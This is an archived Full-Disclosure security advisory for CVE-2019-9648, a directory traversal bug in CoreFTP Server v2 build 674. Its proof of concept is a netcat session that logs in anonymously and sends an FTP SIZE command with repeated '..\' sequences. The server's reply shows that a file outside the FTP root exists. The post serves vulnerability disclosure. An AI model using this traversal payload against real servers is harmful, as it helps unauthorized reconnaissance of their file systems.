| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAM-upGobVChe9tPo2MYde5EuMY4mczr7wzfqFJ_68nmWP+C93A@mail.gmail.com> Date: Mon, 11 Mar 2019 13:29:00 -0400 From: Kevin R <krandall2013@...il.com> To: fulldisclosure@...lists.org Subject: [FD] CVE-2019-9648 CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal CVE-2019-9648 CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal Discovered By: Kevin Randall Summary: By utilizing a directory traversal along with the FTP SIZE command, an attacker can browse outside the root directory to determine if a file exists based on return file size by using a ..\..\ technique Tools used: Parrot OS VM Windows 7 VM FTP / SFTP Server v2 - Build 674 Netcat Proof of Concept (PoC): File 1: ARP.exe Type of file: Application(.EXE) Description: TCP/IP Arp Command Location: C:\Windows\System32\ Size: 20.5 KB (20,992 bytes) Size on disk: 24.0 KB (24,576 bytes) Created: Monday July 13, 2009 7:55:11 PM Modified: Monday July 13, 2009, 9:14:12 PM Accessed: Monday July 13, 2009 7:55:11 PM #nc -nv 192.168.0.2 21 (UNKNOWN) [192.168.0.2] 21 (ftp) open 220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered USER anonymous 331 password required for anonymous PASS anonymous@ 230-Logged on 230 SIZE C:\..\..\..\..\..\..\Windows\System32\ARP.exe 213 20992 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists